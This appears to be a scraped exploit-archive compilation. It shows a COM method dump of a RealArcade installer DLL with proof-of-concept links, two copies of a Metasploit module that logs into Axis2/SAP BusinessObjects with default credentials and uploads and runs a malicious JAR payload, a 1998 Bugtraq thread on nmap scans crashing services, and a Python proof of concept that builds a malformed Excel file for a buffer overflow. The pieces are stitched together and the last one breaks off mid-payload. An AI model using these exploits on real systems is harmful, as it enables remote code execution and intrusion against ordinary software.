/* VT_BSTR [8] [in] */ $CDPath,
/* VT_BSTR [8] [in] */ $StoreFront
)
{
/* method InstallFromCD */
}
/* DISPID=12 */
/* VT_UI4 [19] */
function KillProcess(
/* VT_BSTR [8] [in] */ $__MIDL_0033
)
{
/* method KillProcess */
}
/* DISPID=13 */
function RefreshAddRemovePrograms(
)
{
/* method RefreshAddRemovePrograms */
}
/* DISPID=14 */
function ShellExec(
/* VT_BSTR [8] [in] */ $FilePath,
/* VT_BSTR [8] [in] */ $Params
)
{
/* method ShellExec */
}
/* DISPID=15 */
function ShellExecRunAs(
/* VT_BSTR [8] [in] */ $FilePath,
/* VT_BSTR [8] [in] */ $Params
)
{
/* method ShellExecRunAs */
}
/* DISPID=16 */
/* VT_BSTR [8] */
function PlatformInfo(
)
{
/* method PlatformInfo */
}
/* DISPID=17 */
/* VT_BSTR [8] */
function GetAvailableDrive(
/* VT_INT [22] [in] */ $reqSpace
)
{
/* method GetAvailableDrive */
}
/* DISPID=18 */
/* VT_BOOL [11] */
function InitializeStamp(
/* VT_BSTR [8] [in] */ $exeName,
/* VT_INT [22] [in] */ $offset
)
{
/* method InitializeStamp */
}
/* DISPID=19 */
/* VT_BSTR [8] */
function GetContentID(
)
{
/* method GetContentID */
}
/* DISPID=20 */
/* VT_BSTR [8] */
function GetTrackingID(
)
{
/* method GetTrackingID */
}
/* DISPID=21 */
/* VT_BSTR [8] */
function GetAffiliate(
)
{
/* method GetAffiliate */
}
/* DISPID=22 */
/* VT_BSTR [8] */
function GetCurrency(
)
{
/* method GetCurrency */
}
/* DISPID=23 */
/* VT_BSTR [8] */
function GetPrice(
)
{
/* method GetPrice */
}
/* DISPID=24 */
/* VT_BSTR [8] */
function GetTimestamp(
)
{
/* method GetTimestamp */
}
/* DISPID=25 */
/* VT_BSTR [8] */
function GetOTP(
)
{
/* method GetOTP */
}
/* DISPID=26 */
/* VT_BOOL [11] */
function CopyDocument(
/* VT_BSTR [8] [in] */ $src,
/* VT_BSTR [8] [in] */ $dest
)
{
/* method CopyDocument */
}
/* DISPID=27 */
function InstallerToForeground(
)
{
/* method InstallerToForeground */
}
/* DISPID=28 */
function MonitorLicenseFolder(
)
{
/* method MonitorLicenseFolder */
}
/* DISPID=29 */
function ShutdownLicenseFolderMonitor(
)
{
/* method ShutdownLicenseFolderMonitor */
}
/* DISPID=30 */
/* VT_BSTR [8] */
function GetFolderPath(
/* VT_UI4 [19] [in] */ $__MIDL_0037
)
{
/* method GetFolderPath */
}
}
binary info:
>lm -vm
Image path: C:\Program Files\RealArcade\Installer\bin\InstallerDlg.dll
Image name: InstallerDlg.dll
Timestamp: Mon Mar 14 14:22:44 2011 (4D7E6B04)
CheckSum: 00000000
ImageSize: 00064000
File version: 2.6.0.445
Product version: 2.6.0.445
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 2.0 Dll
File date: 00000000.00000000
Translations: 0409.04b0
ProductName: InstallerDlg Module
InternalName: InstallerDlg
OriginalFilename: InstallerDlg.dll
ProductVersion: 2.6.0.445
FileVersion: 2.6.0.445
FileDescription: InstallerDlg Module
LegalCopyright: Copyright 2010
POC:
pocs availiable here: http://retrogod.altervista.org/9sg_realgames_i.html
http://www.exploit-db.com/sploits/9sg_StubbyUtil.ShellCtl.1.zip
metasploit/Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP) ( multiple)
##
# $Id: axis2_deployer.rb 11330 2010-12-14 17:26:44Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)',
'Version' => '$Revision: 11330 $',
'Description' => %q{
This module logs in to an Axis2 Web Admin Module instance using a specific user/pass
and uploads and executes commands via deploying a malicious web service by using SOAP.
},
'References' =>
[
# General
[ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
[ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
[ 'CVE', '2010-0219' ],
],
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
[
[ 'Java', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux X86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
],
'Author' => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username','axis2' ]),
OptString.new('PATH', [ true, "The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)", '/axis2'])
], self.class)
register_autofilter_ports([ 8080 ])
end
def upload_exec(session)
contents=''
name = Rex::Text.rand_text_alpha(8)
services_xml = %Q{
<service name="#{name}" scope="application">
<description>
#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}
</description>
<messageReceivers>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-only"
class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-out"
class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</messageReceivers>
<parameter name="ServiceClass">
metasploit.PayloadServlet
</parameter>
</service>
}
if target.name =~ /Java/
zip = payload.encoded_jar
zip.add_file("META-INF/services.xml", services_xml)
# We need this class as a wrapper to run in a thread. For some reason
# the Payload class is giving illegal access exceptions without it.
path = File.join(Msf::Config.install_root, "data", "java", "metasploit", "PayloadServlet.class")
fd = File.open(path, "rb")
servlet = fd.read(fd.stat.size)
fd.close
zip.add_file("metasploit/PayloadServlet.class", servlet)
contents = zip.pack
else
end
boundary = rand_text_alphanumeric(6)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"filename\"; "
data << "filename=\"#{name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
data << contents
data << "\r\n--#{boundary}--"
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-admin/upload",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
if (res and res.code == 200)
print_status("Successfully uploaded")
else
print_error("Error uploading #{res}")
return
end
=begin
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
puts res.body
puts res.code
if res.code > 200 and res.code < 300
if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
puts dir
else
if ( a.scan(/catalina\.home<\/th><td style=".*">(.*) <\/td>/i) )
dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
puts dir
end
end
end
=end
soapenv='http://schemas.xmlsoap.org/soap/envelope/'
xmlns='http://session.dsws.businessobjects.com/2007/06/01'
xsi='http://www.w3.org/2001/XMLSchema-instance'
data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
data << '<soapenv:Envelope xmlns:soapenv="' + soapenv + '" xmlns:ns="' + xmlns + '">' + "\r\n"
data << '<soapenv:Header/>' + "\r\n"
data << '<soapenv:Body>' + "\r\n"
data << '<soapenv:run/>' + "\r\n"
data << '</soapenv:Body>' + "\r\n"
data << '</soapenv:Envelope>' + "\r\n\r\n"
print_status("Polling to see if the service is ready")
1.upto 3 do
Rex::ThreadSafe.sleep(3)
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/services/#{name}",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'SOAPAction' => '"' + 'http://session.dsws.businessobjects.com/2007/06/01/run' + '"',
'Content-Type' => 'text/xml; charset=UTF-8',
}
}, 15)
if res.code > 200 and res.code < 300
print_status("")
print_status("NOTE: You will need to delete the web service that was uploaded.")
print_status("Using meterpreter:")
print_status("rm \"webapps/#{datastore['PATH']}/WEB-INF/services/#{name}.jar\"")
print_status("Using the shell:")
print_status("cd \"webapps/#{datastore['PATH']}/WEB-INF/services\"")
print_status("del #{name}.jar")
print_status("")
break
end
end
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
path = datastore['PATH']
success = false
srvhdr = '?'
begin
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/#{path}/axis2-admin/login",
'ctype' => 'application/x-www-form-urlencoded',
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
}, 25)
if not (res.kind_of? Rex::Proto::Http::Response)
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin not responding")
end
if res.code == 404
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin returned code 404")
end
srvhdr = res.headers['Server']
if res.code == 200
# Could go with res.headers["Server"] =~ /Apache-Coyote/i
# as well but that seems like an element someone's more
# likely to change
success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
session = $1
end
end
rescue ::Rex::ConnectionError
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin Unable to attempt authentication")
end
if success
print_good("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")
upload_exec(session)
else
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'")
end
end
end
Joshua D. Abraham/Axis2 / SAP BusinessObjects dswsbobje Upload Exec ( na)
##
# $Id: axis2_deployer.rb 11046 2010-11-15 05:12:48Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Axis2 / SAP BusinessObjects dswsbobje Upload Exec',
'Version' => '$Revision: 11046 $',
'Description' => 'This module logins to a Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.',
'References' =>
[
# General
[ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
[ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
[ 'CVE', '2010-0219' ],
],
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
[
[ 'Java', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux X86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
],
'Author' => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username','axis2' ]),
OptString.new('PATH', [ true, "The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)", '/axis2'])
], self.class)
register_autofilter_ports([ 8080 ])
end
def upload_exec(session)
contents=''
name = Rex::Text.rand_text_alpha(8)
services_xml = %Q{
<service name="#{name}" scope="application">
<description>
#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}
</description>
<messageReceivers>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-only"
class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-out"
class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</messageReceivers>
<parameter name="ServiceClass">
metasploit.PayloadServlet
</parameter>
</service>
}
if target.name =~ /Java/
zip = payload.encoded_jar
zip.add_file("META-INF/services.xml", services_xml)
# We need this class as a wrapper to run in a thread. For some reason
# the Payload class is giving illegal access exceptions without it.
path = File.join(Msf::Config.install_root, "data", "java", "metasploit", "PayloadServlet.class")
fd = File.open(path, "rb")
servlet = fd.read(fd.stat.size)
fd.close
zip.add_file("metasploit/PayloadServlet.class", servlet)
contents = zip.pack
else
end
boundary = rand_text_alphanumeric(6)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"filename\"; "
data << "filename=\"#{name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
data << contents
data << "\r\n--#{boundary}--"
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-admin/upload",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
if (res and res.code == 200)
print_status("Successfully uploaded")
else
print_error("Error uploading #{res}")
return
end
=begin
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
puts res.body
puts res.code
if res.code > 200 and res.code < 300
if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
puts dir
else
if ( a.scan(/catalina\.home<\/th><td style=".*">(.*)&nbsp;<\/td>/i) )
dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
puts dir
end
end
end
=end
soapenv='http://schemas.xmlsoap.org/soap/envelope/'
xmlns='http://session.dsws.businessobjects.com/2007/06/01'
xsi='http://www.w3.org/2001/XMLSchema-instance'
data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
data << '<soapenv:Envelope xmlns:soapenv="' + soapenv + '" xmlns:ns="' + xmlns + '">' + "\r\n"
data << '<soapenv:Header/>' + "\r\n"
data << '<soapenv:Body>' + "\r\n"
data << '<soapenv:run/>' + "\r\n"
data << '</soapenv:Body>' + "\r\n"
data << '</soapenv:Envelope>' + "\r\n\r\n"
print_status("Polling to see if the service is ready")
1.upto 3 do
Rex::ThreadSafe.sleep(3)
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/services/#{name}",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'SOAPAction' => '"' + 'http://session.dsws.businessobjects.com/2007/06/01/run' + '"',
'Content-Type' => 'text/xml; charset=UTF-8',
}
}, 15)
if res.code > 200 and res.code < 300
print_status("")
print_status("NOTE: You will need to delete the web service that was uploaded.")
print_status("Using meterpreter:")
print_status("rm \"webapps/#{datastore['PATH']}/WEB-INF/services/#{name}.jar\"")
print_status("Using the shell:")
print_status("cd \"webapps/#{datastore['PATH']}/WEB-INF/services\"")
print_status("del #{name}.jar")
print_status("")
break
end
end
=begin
useful for axis2 or REST
# Try to execute the payload
1.upto 5 do
Rex::ThreadSafe.sleep(3)
print_status("Polling to see if the service is ready")
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/services/#{name}/run",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
if res.code >= 200 and res.code < 300
# This should usually mean we got a shell
break
end
end
=end
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
path = datastore['PATH']
success = false
srvhdr = '?'
begin
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/#{path}/axis2-admin/login",
'ctype' => 'application/x-www-form-urlencoded',
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
}, 25)
if not (res.kind_of? Rex::Proto::Http::Response)
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin not responding")
end
if res.code == 404
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin returned code 404")
end
srvhdr = res.headers['Server']
if res.code == 200
# Could go with res.headers["Server"] =~ /Apache-Coyote/i
# as well but that seems like an element someone's more
# likely to change
success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
session = $1
end
end
rescue ::Rex::ConnectionError
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin Unable to attempt authentication")
end
if success
print_good("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")
upload_exec(session)
else
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'")
end
end
end
This Metasploit module logins to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.
/nmap-DoS-2.txt ( na)
Date: Wed, 23 Dec 1998 09:31:23 -0500
From: Richard Reiner <rreiner@FSCINTERNET.COM>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: [SecureXpert Labs Advisory SX-98.12.23-01] Widespread DoS vulnerability
SecureXpert Labs Advisory SX-98.12.23-01
Widespread DoS vulnerability can crash systems or disable critical services
Reported by: SecureXpert Labs
(with additional information from the Bugtraq & FreeBSD Security mailing
lists)
WARNING: this item is based on early analysis and additional field
reports. The subject matter is still the subject of active research by
SecureXpert Labs and others. Due to the broad scope of the vulnerability
described and its active exploitation on the Internet, this early
information release is being made.
Summary
A popular security tool called "nmap" can generate unusual network traffic,
which can be exploited to generate a wide variety of failures and crashes
on numerous operating systems.
Note: this family of vulnerabilities is NOT the same as that described in
CERT Advisory CA-98.13 - TCP/IP Denial of Service. CERT CA-98.13 refers to
a fragmentation-related bug in some IP stacks. The DoS vulnerabilities
described herein are not fragmentation related.
Description
The port scanner tool nmap has "stealth scanning" capabilities, designed to
avoid notice by Intrusion Detection systems. When these are used, nmap
generates several types of unusual IP packets (e.g. unexpected FIN packets,
"Christmas Tree" packets, etc.), and unusual sequences of packets (e.g. TCP
connection setup with a SYN packet immediately followed by RST). Nmap is
widely available (http://www.insecure.org/nmap). Built-in functionality in
nmap allows it to be used to target large numbers of systems
simultaneously.
SecureXpert Labs has determined that nmap's "half-open" scanning mode
('nmap -sS') disables inetd on a number of operating systems, including
certain Solaris versions (including 2.6) and some versions of Linux. Work
at SecureXpert Labs has also demonstrated that this scanning mode also
causes Microsoft Windows 98 to display a critical error ("Blue Screen"),
subsequent to which the Windows 98 workstation loses all network
connectivity.
Independent reports also indicate that nmap scanning can cause similar
failure of inetd on several additional operating systems, including HP-UX,
AIX, SCO, and FreeBSD. Further reports indicate that the RPC portmapper
may be affected on some systems. Additional reports indicate also that a
different nmap scanning mode (UDP scanning with 'nmap -sU') crashes Cisco
IOS version 12.0 (including 12.0T, 12.0S, etc.). It has also been reported
that nmap with certain options can cause NeXTStep 3.3 systems to panic and
reboot.
Tests by SecureXpert Labs have confirmed the vulnerability of Solaris 2.6
and what appears to be a small number of older Linux versions. Cisco
Systems has confirmed the Cisco IOS vulnerability. The FreeBSD, HP-UX, AIX,
SCO, and NeXTStep reports have not yet been corroborated.
The nature of this vulnerability leads SecureXpert Labs to believe that
additional operating systems may also be vulnerable.
At this stage in SecureXpert Labs' investigations, it appears that several
of these attacks leave no trace in system logs, unless external Intrusion
Detection systems are in place.
SecureXpert Labs has notified the vendors of affected systems, and is
working with them on further testing, fault isolation, and remediation.
Risks
a. Denial of Service through inetd failure
Remote attackers can disable critical server processes on affected systems.
Failure of the inetd process will commonly disable all ftp and telnet
access to a system, as well as other services such as rlogin and rsh. In
some less common cases, failure of inetd can disable processes such as
BOOTP servers, Web servers, Radius or other authentication servers, etc.
b. Denial of Service through portmapper failure
Remote attackers can disabled critical servers on affected systems.
Failure of the portmapper process will commonly disable NFS and NIS
services, as well as other services on some systems.
c. Denial of Service through kernel panics, hangs, and crashes
If reports that nmap can cause kernel panics, hangs, or crashes are
confirmed, all services on affected servers can be disabled by remote
attackers.
Vulnerable versions
Further details on affected systems and versions will be provided as more
information become available.
Actions
a. Determine if your systems are vulnerable, ether through your own testing
with nmap or through the user of an external audit firm. (nmap is available
>from http://www.insecure.org/nmap/)
b. Install vendor patches as they become available
c. In the short term, critical systems can be defended through application
proxies (or, in some cases, multi-level filters) deployed on non-vulnerable
firewall platforms.
---------------------------------------------------------------------------
Date: Thu, 24 Dec 1998 11:38:07 -0500
From: Jordan Ritter <jpr5@DARKRIDGE.COM>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Re: [SecureXpert Labs Advisory SX-98.12.23-01] Widespread DoS
Richard Reiner (rreiner@FSCINTERNET.COM) wrote:
> WARNING: this item is based on early analysis and additional field
> reports. The subject matter is still the subject of active research
> by SecureXpert Labs and others. Due to the broad scope of the
> vulnerability described and its active exploitation on the Internet,
> this early information release is being made.
I would *hardly* call this an "early information release":
http://geek-girl.com/bugtraq/1997_4/0398.html
http://geek-girl.com/bugtraq/1998_1/0507.html
http://geek-girl.com/bugtraq/1998_2/0037.html
http://geek-girl.com/bugtraq/1998_2/0055.html
Even aleph1 responds:
http://geek-girl.com/bugtraq/1997_4/0401.html
Jordan Ritter
Network Security Engineer Systems Administrator
Ring-Zero, Netect, Inc. Boston, MA Darkridge Security Solutions
---------------------------------------------------------------------------
Date: Thu, 24 Dec 1998 17:07:36 -0800
From: Aleph One <aleph1@UNDERGROUND.ORG>
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
To: BUGTRAQ@netspace.org
Subject: Network Scan Vulnerability [SUMMARY]
This is a summary of the reports on nmap crashing inetd's and some
operating systems. As mentioned elsewhere, as opposed to what SecureXpert
Labs seems to think, this is a rather old issue that appears every
once in a while.
The reports:
xinetd on FreeBSD 2.2.7 does not crash when scanned with nmap -sT.
Solaris versions earlier than Solaris 7 are affected.
Irix 5.3, 6.2, 6.3 inetd's dies by nmap-1.51 with -vv
Irix 6.5SE inetd's die with nmap-1.51 -F
SunOS 4.1.3 reboots when scanned by nmap-1.51 with -vv.
UNICOS 10 inetd's *may* die when scanned by nmap-1.51 -F.
No can can seem to crash Windows 98 as reported by SecureXpert Labs.
OpenBSD 2.4 seems fine.
If anyone can get Windows 98 to crash please let me know as this was
really the only *new* information in the SecureXpert advisory.
Thanks to:
Joe Shaw <jshaw@insync.net>
"HD Moore" <hdmoore@usa.net>
Kameron Gasso <krg@lockdown.net>
"Richard Johnson" <rdump@river.com>
Philipp Schott <schott@uni-freiburg.de>
Alla Bezroutchko <alla@sovlink.ru>
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
---------------------------------------------------------------------------
Date: Thu, 31 Dec 1998 00:08:40 -0500
From: David Gale <dgale@DATAPEX.COM>
To: BUGTRAQ@netspace.org
Subject: nmap kills hylafax too.
Dont know if it has been reported yet, but the nmap scanner will also kill
the hfaxd daemon. This was confirmed using nmap -sS and running
hylafax-4.0
DG
Widespread DoS vulnerability can crash systems or disable critical services, using nmap v2.01 to generate unusual network traffic (details of packet types used for DoS attacks included).
webDEViL/Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow PoC ( windows)
"""
This is a PoC for MS11-021/CVE-2011-0978
Microsoft Office Excel Axis Properties Record Parsing Buffer Overflow
w3bd3vil[at]gmail[dot].com
twitter.com/w3bd3vil
Modify bits at file location 0x39E7
0:000:x86> r
eax=04dd6380 ebx=ffff5554 ecx=04ab5108 edx=00000000 esi=04ab4800 edi=ffff5554
eip=2f36a2fd esp=0021420c ebp=00214218 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
2f36a2d5 33d2 xor edx,edx
2f36a2d7 53 push ebx
2f36a2d8 8b5d18 mov ebx,dword ptr [ebp+18h]
2f36a2db 891540cdfc2f mov dword ptr [EXCEL!DllGetLCID+0x32517 (2ffccd40)],edx
2f36a2e1 3b580c cmp ebx,dword ptr [eax+0Ch]
2f36a2e4 0f8d8e9c1a00 jge EXCEL!Ordinal40+0x423f78 (2f513f78)
2f36a2ea 39551c cmp dword ptr [ebp+1Ch],edx
2f36a2ed 56 push esi
2f36a2ee 57 push edi
2f36a2ef 0f84a09c1a00 je EXCEL!Ordinal40+0x423f95 (2f513f95)
2f36a2f5 395514 cmp dword ptr [ebp+14h],edx
2f36a2f8 7f27 jg EXCEL!Ordinal40+0x27a321 (2f36a321)
2f36a2fa 8b4010 mov eax,dword ptr [eax+10h]
2f36a2fd 8b0498 mov eax,dword ptr [eax+ebx*4] ds:002b:04dab8d0=????????
2f36a300 3bc2 cmp eax,edx
2f36a302 7425 je EXCEL!Ordinal40+0x27a329 (2f36a329)
2f36a304 0fb738 movzx edi,word ptr [eax]
2f36a307 8d4c3f02 lea ecx,[edi+edi+2]
2f36a30b 51 push ecx
eax here points to location in the file 0xFB4.
0:000:x86> dd eax
04dd6380 0376ec80 04dd02b0 04dd0330 04dd0318
04dd6390 04dd0380 04dd0398 04dd03b0 04dd03c8
04dd63a0 04dd03e0 00000000 00000001 00000001
04dd63b0 00000001 00000001 00000001 00000001
04dd63c0 00000001 00000001 00000001 00000000
04dd63d0 00000000 00000000 00000000 00000000
04dd63e0 00000000 00000000 00000000 00000000
04dd63f0 00000000 00000000 00000000 00000000
0:000:x86> dd 0376ec80
0376ec80 00630009 0061006c 00730073 006f0077
0376ec90 006b0072 eaf10000 00770009 00720061
0376eca0 0075006d 00200070 00350023 eaf10000
0376ecb0 0283eb30 6666ce60 0283eb40 6666c960
0376ecc0 0283eb4c 6666c960 0000f80c 00000000
0376ecd0 00006338 00000000 00000001 00000000
0376ece0 0283eb98 6666ce60 0283eba4 6666c960
0376ecf0 0283ebb0 6666c960 00000000 00000000
webDEViL
"""
import binascii
wD="d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff090006000000000"
wD+="000000000000001000000540000000000000000100000feffffff00000000feffffff000000"
wD+="0053000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
wD+="fffffffffffffffffffffffffffffffffffffffffffffffff0908100000060500e228cd07c9"
wD+="c0000006020000e1000200b004c10002000000e20000005c0070000800004e49492d54524c5"
wD+="420202020202020202020202020202020202020202020202020202020202020202020202020"
wD+="202020202020202020202020202020202020202020202020202020202020202020202020202"
wD+="0202020202020202020202020202020202020202020202020202042000200b0046101020000"
wD+="00c00100003d011000010002000300040005000600090008009c0002000e001900020000001"
wD+="20002000000130002000000af0102000000bc01020000003d001200e7fa2c013e2b2d1e3800"
wD+="00000000010058024000020000008d00020000002200020000000e0002000100b7010200000"
wD+="0da000200000031001a00c8000000ff7f9001000000000000050141007200690061006c0031"
wD+="001a00c8000000ff7f9001000000000000050141007200690061006c0031001a00c8000000f"
wD+="f7f9001000000000000050141007200690061006c0031001a00c8000000ff7f900100000000"
wD+="0000050141007200690061006c0031001a00a0000000ff7f900100000000000005014100720"
wD+="0690061006c0031001a00c80004000c009001000001000000050141007200690061006c0031"
wD+="001a00c800040024009001000001000000050141007200690061006c0031001c00a0000000f"
wD+="f7f900100000002000006015400610068006f006d00610031001a00dc000000ff7f90010000"
wD+="00020000050141007200690061006c0031001a009a010000ff7f90010000000000000501410"
wD+="07200690061006c0031001a009a010000ff7f9001000000000000050141007200690061006c"
wD+="0031001a0022010000ff7f9001000000020000050141007200690061006c0031001a00bd010"
wD+="000ff7f9001000000000000050141007200690061006c0031001a00bd010000ff7f90010000"
wD+="00000000050141007200690061006c0031001a00c80001000a00bc020000000200000501410"
wD+="07200690061006c0031001a00a0000000ff7f9001000000020000050141007200690061006c"
wD+="0031001a00c80000000a009001000000020000050141007200690061006c0031001a00c8000"
wD+="0000c009001000000020000050141007200690061006c0031001a00c8000100ff7fbc020000"
wD+="00020000050141007200690061006c0031001a00c80001000900bc020000000200000501410"
wD+="07200690061006c001e041c000500170000222422232c2323305f293b5c28222422232c2323"
wD+="305c291e04210006001c0000222422232c2323305f293b5b5265645d5c28222422232c23233"
wD+="05c291e04220007001d0000222422232c2323302e30305f293b5c28222422232c2323302e30"
wD+="305c291e0427000800220000222422232c2323302e30305f293b5b5265645d5c28222422232"
wD+="c2323302e30305c291e0437002a003200005f282224222a20232c2323305f293b5f28222422"
